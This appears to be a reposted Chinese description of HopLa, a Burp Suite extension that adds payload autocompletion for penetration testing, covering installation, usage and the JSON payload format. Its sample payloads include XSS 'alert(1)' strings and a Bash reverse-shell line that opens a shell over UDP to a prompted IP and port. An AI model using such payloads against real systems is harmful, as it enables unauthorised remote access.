目录导航
HopLa Burp Suite Extender插件-在Burp Suite中添加自动补全支持和有用的有效负载.
PayloadsAllTheThings的所有功能,而无需额外输入。此扩展在Burp Suite中添加了自动补全支持和有用的有效负载,使入侵变得更容易。
随时改善您的有效载荷!
入门
安装
- 从发布目录下载jar文件
- 使用“扩展器”选项卡将其添加到Burp Suite
建造
执行gradle build,您将在中准备好插件releases/HopLa.jar。
用法
默认情况下,HopLa随附了默认的有效负载。您可以通过在菜单中加载自定义JSON文件来添加自己的文件。
HopLa首次使用时会创建一个JSON文件,其中包含jar文件目录中的所有有效负载。
按下Ctrl+Q以显示有效载荷库菜单。
您可以在顶部菜单中禁用全局自动补全功能。
对于i3,将以下行添加到$HOME/.config/i3/config浮动框架中:
for_window [class=".*burp-StartBurp.*" title="^ $"] floating enable如何添加有效载荷
JSON有效负载文件遵循以下结构:
{
"categories": [
{
"name": "XSS",
"values": [
{
"name": "Simple",
"value": "alert(1)
"
},
{
"name": "Multiline",
"value": "AAAA\nBBBB"
},
{
"name" : "Nested XSS menu",
"values": [
{
"name": "Simple 2",
"value": "alert(1)
"
}
]
}
]
}
],
"keywords": [
{
"name": "Headers",
"values": [
"X-Forwarded-For",
"X-Originally-Forwarded-For",
"X-Originating-Ip",
"X-Originating-IP"
]
}
]
}
没有嵌套限制。
您可以自动添加一个提示对话框:
{
"name": "Bash UDP",
"value": "sh -i >& /dev/udp/§IP§/§PORT§ 0>&1",
"prompt": ["IP","PORT"]
},
要仅添加菜单中未显示的关键字,可以将其添加到关键字类别中:
{
"keywords": [
{
"name": "Headers",
"values": [
"X-Forwarded-For",
"X-Originally-Forwarded-For",
"X-Originating-Ip",
"X-Originating-IP"
]
}
]
}
HopLa插件下载地址
①GitHub: HopLa.jar
②迅雷网盘: https://pan.xunlei.com/ 提取码: db43
解压密码: www.ddosi.org
HopLa插件截图
快捷键ctrl Q
XSS payloads
文件读取
自定义payloads
如需修改payloads,到插件所在目录下的config.json文件里修改
自带的payloads比较少,建议替换成自己的.
路线图
- 支持有效载荷菜单的自定义键绑定
谢谢
- https://github.com/Static-Flow/BurpSuiteAutoCompletion
- https://github.com/d3vilbug/HackBar
- https://github.com/swisskyrepo/PayloadsAllTheThings
非常感谢您的出色工作!